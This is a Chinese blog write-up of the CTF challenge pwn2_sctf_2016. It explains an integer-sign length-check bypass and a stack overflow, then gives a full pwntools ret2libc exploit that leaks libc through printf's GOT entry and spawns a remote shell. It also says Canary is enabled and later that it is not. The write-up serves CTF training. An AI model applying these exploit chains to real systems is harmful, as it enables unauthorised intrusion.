pwn2_sctf_2016

最新推荐文章于 2023-06-08 14:45:22 发布
最新推荐文章于 2023-06-08 14:45:22 发布
阅读量640 收藏 2
点赞数 1
分类专栏: BUU-PWN 文章标签: pwn CTF WriteUp python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123986308
版权

pwn2_sctf_2016

使用checksec查看:在这里插入图片描述
开启了栈不可执行和Canary。

先放进IDA中分析:
在这里插入图片描述

  • 主函数给出了vuln()函数,直接跟进。

vuln()
在这里插入图片描述

  • get_n((int)&nptr, 4u);:获取数据长度,用户可控。
  • if ( v2 > 32 ):若长度超过32,退出程序。
  • get_n((int)&nptr, v2); return printf("You said: %s\n", &nptr);:获取用户的输入并输出。

题目思路

  • 判断长度可用-1进行绕过。
  • 没有Canary,不限长度后可以利用栈溢出。
  • 使用ret2libc的方式getshell。

步骤解析

无需

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",27834)
# r = process("../buu/pwn2_sctf_2016")
elf = ELF("../buu/pwn2_sctf_2016")
libc = ELF("../buu/ubuntu16(32).so")

#params
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']
main_addr = elf.symbols['main']
str_addr = 0x80486F8
do_thing_addr = 0x80484D0

#attack
r.sendlineafter("read? ","-1")
payload = b'M'*(0x2C+4) + p32(printf_plt) + p32(main_addr) + p32(str_addr) + p32(printf_got)
r.sendlineafter("data!\n",payload)
r.recvuntil("said: ")
r.recvuntil('said: ')
printf_addr = u32(r.recv(4))

#libc
base_addr = printf_addr - libc.symbols['printf']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2
r.sendlineafter("read? ","-1")
payload = b'M'*(0x2C+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter("data!\n",payload)

r.interactive()
m0sway
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 929
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn2_sctf2016
红叶的博客
11-01 472
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
CTFpwn2_sctf_2016
凉水的博客
07-16 868
pwn2_sctf_2016
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 314
BUUCTF 做题练习
pwn(2)-栈溢出下
qq_73667990的博客
06-08 1376
只要我们通过特定的汇编代码把特定的寄存器设定为特定的值后,在调用int 80h执行sys_execve(“/bin/sh”,NULL,NULL)就可以获得shell了;64位程序传递参数不是直接通过栈,而是前六个参数通过寄存器,分别是RDI,RSI,RDX,RCX,R8,R9。不同内核态操作通过给寄存器设置不同的值,在调用指令int 80h,就可以通知内核完成不同的功能。2.ebx设为"/bin/sh"字符串的地址。2.RDI设为"/bin/sh"字符串的地址,RDI=&(“/bin/sh”)
英招杯 pwn2(ret2shellcode)
qq_53928256的博客
11-16 285
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 1960
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
[PWN] BUUCTF pwn2_sctf_2016(整数溢出+泄露libc)
空城惜梦的博客
06-05 692
[PWN] BUUCTF pwn2_sctf_2016解题分析漏洞利用payload分析payload1payload2 解题分析 按照惯例先checksec,开了nx保护和部分RELRO 接着运行文件,观察程序的运行逻辑,读入一个长度len然后把输入的字符,再打印输入的Len个字符 32位IDA打开文件,main函数调用了vuln() 发现对输入的长度len做出了限制,len不能大于32 当len>32后,程序将结束,这就导致无法直接溢出 进入get_n函数,发现get_n会接收a2个长度
pwn2_sctf_2016的32位和64位、[ZJCTF 2019]EasyHeap 的收获
Probeginner的博客
05-28 164
[ZJCTF 2019]EasyHeap 堆菜鸡题后简 结,见谅 查看保护机制: Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 本题的思路就是: 控制heaparray附近的区域,覆盖heaparray[0]处为free_got的地址,使之被作为chunk看待,edit覆盖free_got地址为syste.
[BUUCFT]PWN——pwn2_sctf_2016(整数溢出+泄露libc)
mcmuyanga的博客
10-05 3863
pwn2_sctf_2016[整数溢出+泄露libc] 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看看大概的执行情况 32位ida载入,shift+f12检索程序里的字符串,没有看到现成的system和‘/bin/sh’,加上开启了NX保护,估计是泄露libc类型的题目 从main函数开始看程序,main函数就调用了一个vuln函数 注意第7行的输入函数不是get,是程序自定义的函数get_n, 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是un
pwn学习笔记2】cgpwn2(攻防世界新手pwn题)
weixin_45927195的博客
03-14 439
改变system函数的参数 先运行,发现可以输入两次。再查看防御机制,开启了NX保护,即堆栈不可执行。 用ida查看主函数,发现只有一个hello()函数。查看其内容,直接找到运行时看到的"please tell me your name"。第一次输入规定了长度,第二次没有规定,存在漏洞: 找到一个后门函数pwn(),存在 call _system语句,但是这个函数的参数"echo heheh...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值